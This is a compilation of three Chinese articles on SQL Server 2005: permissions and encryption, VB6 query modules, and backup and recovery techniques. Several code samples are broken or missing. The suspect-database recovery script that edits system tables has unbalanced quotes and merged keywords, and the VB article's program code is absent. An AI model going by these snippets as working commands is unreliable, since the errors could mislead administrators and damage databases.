内建数据库角色:指一组固定的有某些权限的数据库角色, SQL Server内建10种数据库角色, 它不能更改或删除, 若给予使用者有内建角色中的数据库拥有者权限, 它便拥有该数据库的完整操作权。其余各角色的详细权限说明可参考SQL Server books online, 其中有包含内建服务器角色与数据库角色的完整说明。用户定义数据库角色:如果用户感到内建数据库角色不能满足需求, 也可以自己定义数据库角色, 同时可以定制该角色的不同权限。

创建用户自定义数据库角色可以使用CREATE ROLE语句。

语法格式:CREATE ROLE role_name[AUTHO-RIZATION owner_name]

数据库用户对应于服务器登录名以便登录者可以操作数据库, 服务器登录名必须要与数据库的用户映射后才拥有操作数据库的权限。

数据库用户属于某组数据库角色以获取操作数据库的权限, 当然用户的权限也可以定制, 即单独为某个用户进行授权。

2.3 授予用户权限

SQL Server允许你给SQL Server中一些不同的对象指派一组不同的权限。能够为其指派权限的对象包括表、视图和存储过程。触发器隐含具有创建它们的人的权限。用户可以在需要时混合搭配这些权限。

对象上的用户权限分为6种不同的类型。

SELECT:允许用户"看到"数据。如果用户拥有该权限, 则用户能够在其被授予权限的表或视图上运行SELECT语句。

INSERT:允许用户创建新的数据。具有这种权限的用户能够运行INSERT语句。注意, 与许多系统不同, 具有INSERT能力并不一定意味着拥有SELECT权限。

UPDATE:允许用户修改已有的数据。具有这种权限的用户能够运行UPDATE语句。类似于INSERT语句, 具有UPDATE能力并不一定意味着拥有SELECT权限。

DELETE:允许用户删除数据。具有这种权限的用户能够运行DELETE语句。同样, 具有DELETE能力不一定意味着拥有SELECT权限。

REFERENCES:在要插入行的表中有引用另一个表的外键约束, 而用户在那个表上没有SELECT权限, REFERENCES权限允许用户插入行。

EXECUTE:允许用户EXECUTE指定的存储过程

用户可以通过"对象资源管理器"来管理授权限, 也可以通过授权命令来进行管理。

【例1】给stu数据库上的用户david和wang授予创建表的权限。

以系统管理员身份登录SQL Server, 新建一个查询, 输入以下语句:

GRANT CREATE TABLE TO david, wang

【例2】将特定的权限授予用户liu、zhang和dong, 使这些用户对student表有所有操作权限。

GRANT INSERT, UPDATE, DELETE ON student TOliu, zhang, dong

【例3】对所有ROLE2角色成员拒绝CREATE TABLE权限。

DENY CREATE TABLE TO ROLE2

【例4】取消已授予用户wang的CREATE TABLE权限。

REVOKE CREATE TABLE FROM wang

2.4 安全的密码策略

密码策略是安全配置的第一步, 但是很多数据库账号的密码过于简单。sa是SQL Server的一个超级用户, 数据库应用程序尽量不要使用sa帐号, 建议数据库管理员创建一个新的超级用户来管理数据库, 但也不能让管理员权限的帐号泛滥。应根据实际需要分配账号, 并赋予仅仅能够满足应用要求和需要的权限。对于sa更应该注意, 不要让sa账号的密码写于应用程序或者脚本中。SQL Server2005安装的时候, 如果是使用混合模式, 那么就需要输入sa的密码, 最好不要为空, 同时养成定期修改密码的好习惯。数据库管理员应该定期查看是否有不符合密码要求的账号。

关于用户访问的安全性, 还可以利用Windows的组策略来设置密码策略, 在cmd中输入gpedit.msc就会弹出组策略编辑器。可以设置密码长度, 复杂性要求, 使用期限等等。

3、数据加密

SQL Server 2005一个令人激动的特性是内置了加密的功能。在这个新版的SQL Server中, 开发团队直接在T-SQL中加入了加密工具、证书创建和密钥管理的功能。用户可以直接利用它的加密功能对重要数据进行加密。

T-SQL现在支持使用对称密钥和非对称密钥, 证书和密码。SQL Server内置了用来加密敏感数据的密钥、证书等函数。使用这个功能可以极大的增加数据库和应用的安全性。

SQL Server2005采用密钥进行加密, 这些密钥可以是对称的, 也可以是非对称的, 在对称密钥加密中, 数据的发送方和接收方具有相同密钥, 发送方使用该密钥和加密算法加密数据, 当数据到达接收方时, 使用相同的加密算法和密钥解密数据, 此方法的优点是其加解密性能优于使用非对称密钥时的情形, 但是因为仅仅使用一个密钥进行加密, 任何拥有该密钥的人都可以解密数据。

非对称密钥加密使用两种密钥:公钥和私钥。发送方使用接收方的公钥加密数据, 所有人都可以获得公钥, 其安全性在于当接收方接收到数据时, 接收方使用其私钥解密数据, 而公钥不能解密数据, 所以其安全性比较高。

在加密过程中还有一个概念就是证书, 证书本质上是包含特别元数据的非对称密钥。证书可以由任何人创建, 但如果希望确保数据的发送方和接收方都不是冒名顶替的, 那就需要用到证书的颁发机构, 在支付较少的费用之后, 由证书颁发机构进行身份核查并向客户提供一个他们签名的证书, 当客户使用这一经过签名的证书发送数据时, 接收方可以通过证书颁发机构来验证该证书。还有一种证书叫"自签名证书", 任何人都能创建这种证书, SQL Server 2005在每一次启动时自动创建一个自签名证书, 这一证书被用于SQLServer验证期间的加密连接。

4、存储安全性--定期备份

定期进行数据库备份是防止数据被破坏的最基本的防范措施, 定时备份可以有效地应对数据灾难, 增强系统数据的安全性, 将系统的损失最大限度地降低。

SQL Server的备份方法有四种, 完全备份:备份指定数据库的所有内容。差异备份:备份上一次完全备份以后发生更改的内容。事务日志备份:备份上一次完全备份、差异备份以及事务日志备份以后发生更改的内容。文件和文件组备份:备份单个的文件或文件组。

合理的数据库备份与恢复管理是保证数据库安全的必要手段。数据备份在保证备份数据的完整性的同时, 也要建立详细的备份数据档案。数据备份主要在硬件和软件两个方面进行。硬件备份是指用硬件冗余来保证系统的正常运行, 如磁盘镜像。软件备份指的是将系统数据额外保存到其它介质上, 当出现错误时可以将系统恢复到备份时的状态, 防止逻辑的损坏。数据恢复也称为数据重载或数据装入, 是由于数据磁盘损坏或者数据库系统崩溃造成数据丢失时, 使用备份对数据库进行恢复的过程。恢复技术主要包括:基于备份的恢复技术、基于备份和运行日志的恢复技术和基于多备份的恢复技术。

5、总结

数据库中存放着大量的数据, 保护数据不受内部和外部的侵害是一项重要的任务。SQLServer2005广泛地应用于企业的各个部门, 做为数据库系统管理员, 需要深入地理解SQL Server的安全控制策略, 以实现安全管理的目标。

参考文献

[1]施伯乐, 丁宝康, 汪卫.数据库系统教程[M].北京:高等教育出版社, 2004.

[2] (美) 夏普.Microsoft SQL Server 2005完全参考手册.清华大学出版社, 2008.

[3]魏慧, 李艳鹏.剖析SQL Server 2005数据安全性策略[J].中国高新技术企业, 2009 (18) :110-111.

[4]张建伟.数据库技术与应用-SQL Server 2005[M].人民邮电出版社, 2008.

关于SQL数据库查询模块应用篇8

VB6.0全称Visual Basic6.0是Microsoft公司推出的基于Windows环境的计算机程序设计语言,它采用面向对象与事件驱动的程序设计思想,使编程变得更加方便、快捷。是国内外最流行的程序设计语言之一,也是学习开发Windows应用程序首选的程序设计语言。目前已经成为高等院校计算机专业及非计算机专业的重要课程,而倍受程序员及广大电脑爱好者的青睐。另外,由微软的统计数据显示,利用VB开发的应用程序中,有85%以上是和数据库相关的,它在数据库应用方面具有相当强大的功能。

2 查询

查询功能是数据库管理系统中不可缺少的部分,在VB中实现数据库查询的方法有四种,其中Seek、Find、filter三种方法所设计的查询功能通用性和灵活性较差,在此不作介绍。要实现功能强大的查询必须借助于SQL的Select语句来实现,通过“OptionButton”控件为Select提供“单一查询条件”来完成单项查询模块的设计;根据现实管理习惯,通过“ComboBox及TextBox”等控件为Select提供“多项复合条件查询条件”来完成多项查询模块的设计。并将查询的结果放入DBGRID控件中进行浏览。

现以笔者完成的《华南物供应资源管理软件》为例,说明使用SELECT-SQL查询语句实现查询功能的具体方法。

3 SQL查询

SQL即结构化查询语言,它是关系型数据库的标准语言。由于SQL语言使用方便、功能丰富、简单易学得到很快的应用和推广,是各种关系型数据库的公用语言。使用SQL查询可以从一个表或多个表或视图中对数据库进行查询。设计出功能比较强大的数据库MIS.。有关SQL的更多信息,请参阅相关书籍,如:《SQL Server项目开发实践》、《SQL Server教程》等,本文不多介绍)。它的核心语句是Select-SQL语句。

3.1 Select-SQL查询语句的格式

Select[DICTINCT/ALL]——查询目标列

FROM tableexpression——表名/视图名

[WHERE]——条件

[GROUP BY…]——将查询结果的记录分组

[HAVING…]——满足条件的分组

[ORDER BY…]——对查询结果进行排序

3.2 单项查询模块

3.2.1 应用的数据库

hwin_db.mdb中包含表:input字段名:资物名称、供货单位、供货日期、到货数量、总金额…….等等。

3.2.2 定义窗体及控件(见表1)表1

3.2.3 编写程序代码

变量定义

3.3 多项复合查询模块

3.3.1 应用的数据库

hwin_db.mdb中包含表:input字段名:物资名称、供货单位、供货日期、到货数量、总金额等等。

3.3.2 定义窗体及控件

如表2。

3.3.3 编写程序代码

下面程序可实现“物资名称”为某值、供货日期在一定范围的采购明细的查询。

定义变量

4结语

本文对Select-SQL语句进行了详细的介绍,给出了窗体控件的属性和代码的核心部分,并去掉了许多修饰性的内容,在此基础上稍加扩充或修改,便可得到更完善的通用查询模块。以上程序均在Windows XP环境下VB6.0中运行通过。

参考文献

[1]曾强聪.Visual Basic6.0程序设计教程.北京:中国水利水电出版社,2004.

[2]余杰.SQL Server项目开发实践.北京:中国铁道出版社, 2006.

SQL数据库的备份与恢复技巧篇9

1 SQL数据库备份

1.1 数据库备份的类型

SQLServer2005提供了四种备份数据库的类型:它们分别是完整备份、差异备份、事务日志备份和文件和文件组备份。完整备份:备份整个数据库的所有内容, 包括事务日志。该备份类型需要比较大的存储空间来存储备份文件, 备份时间也比较长, 在还原数据时, 也只要还原一个备份文件。差异备份:是完整备份的补充, 差异备份只备份上次完整备份后更改的数据。事务日志备份:事务日志备份只备份事务日志里的内容。事务日志记录了上一次完整备份或事务日志备份后数据库的所有变动过程。文件和文件组备份:如果在创建数据库时, 为数据库创建了多个数据库文件或文件组, 可以使用该备份方式。

备份数据库要充分使用以上不同方式的组合, 使备份时间短、备份数据量小, 恢复操作简单。数据库可以备份到磁盘或磁带中, 如果是备份到磁盘中, 可以有两种形式:一种是文件的形式, 一种是备份设备的形式。但无论是什么形式, 在硬盘中的体现都是文件形式。数据库的备份的是我们数据库管理员的基本操作。

1.2 备份数据库应该考虑的问题

(1) 什么时候备份数据库? (2) 隔多久备份一次数据库?每天数据库里改变的数据有多少?如果一天只有数十条数据改变, 却天天备份数据库, 这也不是一个明智的选择。 (3) 用什么方式备份数据库?每次备份数据库都用完整模式, 还是先用一次完整模式后再用几次差异备份模式? (4) 将数据库备份到哪里?是磁盘中, 还是磁带中? (5) 一旦数据发生问题, 恢复数据要花多少时间?数据能恢复到哪个时间状态?如何备份数据库, 主要是看数据库里每天变动的数据量以及恢复数据时可以允许多大范围内的误差而决定的。

2 恢复模式

在SQL Server 2005事务日志会记录数据库中每一次的数据变动。事实上并不是所有数据库都需要记录每一次的数据操作。如果每个操作都要记录的话, 数据库不但要写数据文件, 而且还要写日志文件, 在操作大量数据时 (如导入数据) , 会降低数据库的性能。在SQL Server 2005可以使用“恢复模式”来设置事务日志的操作方法。SQL Server 2005中的恢复模式分为以下三种:

2.1 完整恢复模式

在该恢复模式下, SQL Server 2005会完整记录下操作数据库的每一个步骤。通常来说, 对数据可靠性要求比较高的数据库需要使用该恢复模式, 如银行、邮电等部门的数据库系统, 任何事务日志都是必不可少的。该恢复模式也是SQL Server 2005默认的恢复模式。使用完整恢复模式可以将整个数据库恢复到一个特定的时间点。是这个时间点可以是最近一次可用的备份、一个特定的日期和时间或标记的事务。在该模式下应该定期做事务日志备份, 否则日志文件将会变得很大。

2.2 大容量日志恢复模式

是对完整恢复模式的补充。在该恢复模式下, 只对大容量操作 (如导入数据、select into等操作) 进行最小记录, 在保护大容量操作不受媒体故障的危害下, 提供最佳性能并占用最小日志空间。例如一次在数据库中插入数十万条记录时, 在完整恢复模式下每一个插入记录的动作都会记录在日志中, 那么数十万条记录将会使日志文件变得非常大。在大容量日志恢复模式下, 只记录必要的操作, 不记录所有日志, 这么一来, 可以大大提高数据的性能, 但是由于日志不完整, 一旦出现问题, 数据将有可能无法恢复。因此, 一般只有在需要进行大量数据操作时才将恢复模式改为大容量日志恢复模式, 将数据处理完毕之后, 马上恢复到完整恢复模式。

2.3 简单恢复模式

在该模式下, 数据库会自动把不活动的日志删除。因此简化了备份的还原, 但是因为没有事务日志备份, 所以不能恢复到失败的时间点。通常只有在对数据库数据安全要求不太高的数据库中使用。在该模式下数据库只能做完整备份和差异备份。

在SQL的对象资源管理器窗口中就可以完成数据库的备份和还原的操作。

3 SQL数据库的恢复技巧

3.1 在SQL Server Management Studio里还原数据的方法

启动【SQL Server Management Studio】, 右击要还原的数据库, 在弹出的快捷菜单里选择【任务】à【还原】à【数据库】, 【弹出】对话框选择【还原数据库】对话框SQL Server 2005在【选择用于还原的备份集】区域里进行了完善工作, 可以一次性选择多个备份集来还原数据库, SQL Server 2005会自动按次序还原这些备份。如果顺利的话, 数据库就还原成功了。

3.2 用T-SQL语言还原数据库

T-SQL语言里提供了RESTORE DATABASE语句来恢复数据库备份, 用该语句可以恢复完整备份、差异备份、文件和文件组备份。如果要还原事务日志备份则还可以用RESTORE LOG语句。虽然RESTORE DATABASE语句可以恢复完整备份、差异备份、文件和文件组备份, 下面简单的介绍还原完全备份的方法, 其它方法可以参考进行。

例如:用名为“Northwind备份”的备份设备来还原Northwind数据库, 其代码如下:

USE master

RESTORE DATABASE Northwind

FROM Northwind备份

3.3 无日志文件的恢复技巧

有时候备份数据库的时候, 丢失或损坏了数据库的日志文件, 导致在附加恢复数据库的时候质疑出错, 我们可以采用下面的办法, 使得数据库恢复成功。例:

被置疑的数据库是sp_detach_db和附加数据库是sp_attach_single_file_db。大致的步骤是:

(1) 新建一个同名的数据库;

(2) 再停掉sql server (注意不要分离数据库) ;

(3) 用原数据库的数据文件覆盖掉这个新建的数据库;

(4) 再重启sql server;

(5) 此时打开企业管理器时会出现置疑, 先不管, 执行下面的语句 (注意修改其中的数据库名) ;

(6) 完成后一般就可以访问数据库中的数据了, 这时, 数据库本身一般还要问题, 解决办法是, 利用数据库的脚本创建一个新的数据库, 并将数据导进去就行了。

USE MASTER

SP_CONFIGURE'ALLOW UPDATES', 1 RECONFIGURE WITH

OVERRIDE

UPDATE SYSDATABASES SET STATUS=32768 WHERENAME='置疑的数据库名

sp_dboption'置疑的数据库名', 'single user', 'true'

DBCC CHECKDB ('置疑的数据库名')

update sysdatabases set status=28 where name='置疑的数据库名'

sp_configure'allow updates', 0 reconfigure with override

sp_dboption'置疑的数据库名, 'single user', 'false'

Go数据库就恢复成功了。

3.4 建立自动备份的维护计划

既然数据库备份如此重要, 作为一个数据库管理员就不得不花大量的时间去给数据库做备份。当一个数据库里数据更新得比较频繁时, 那么一天几次备份是必不可少的, 如果每次都要数据库管理员手动备份数据库, 那将是一个负担不堪的工作任务。SQL Server 2005中可以使用维护计划来为数据库自动备份, 减少数据库管理员的工作负担。其使用方法如下:启动【SQL Server Management Studio】, 在【对象资源管理器】窗口里选择【数据库实例】à【管理】à【维护计划】选项中进行。

4 小结

一个数据库管理员, 为了保证数据库里的数据万无一失, 必须要定期对数据库进行备份, 一旦数据库出现了问题, 可以从备份的文件里最大程度地还原数据。

备份数据库要充分使用几种不同方式的组合, 使备份时间短、备份数据量小, 恢复操作简单高效。要妥善管理好备份设备。备份设备尽量不要与数据库系统放在同一台服务器上, 以免硬件发生故障时备份数据也保不住。如果可能的话, 可以将备份设备刻录到光盘上。使用维护计划可以将数据库管理员从繁重的备份工作里解放出来, 提高数据库的管理效率。

摘要：SQL数据库是现在普遍采用的一种关系型的数据库管理系统。数据库中数据的重要性事显而易见的, 但是因为种种原因, 如磁盘故障、计算机硬件故障、用户操作失误等, 都有可能会损坏数据。为了保证在发生这些意外的时候可以最大限度地挽救数据, 数据库管理员必须要经常备份数据库里的数据, 以便在数据库出现问题的时候还原。本文以SQL2005为例, 介绍了几种数据库备份和恢复的技巧。

关键词：SQL数据库,数据灾难,数据库恢复

参考文献

[1]刘少伟.企业信息系统数据安全性分析[J].商业经济, 2009 (2) .

[2]张跃东.用VFP备份和恢复SQL Server数据库的方法[J].信息技术, 2008 (11) .

[3]Mark Jonikas, 刘国田.SQL数据库服务器Microsoft SQL Server6.0简化了数据库管理[J].个人电脑, 1996 (1)

[4]魏建斌.Informix数据库数据备份与恢复技术初探[J].甘肃高师学报, 2006 (2) .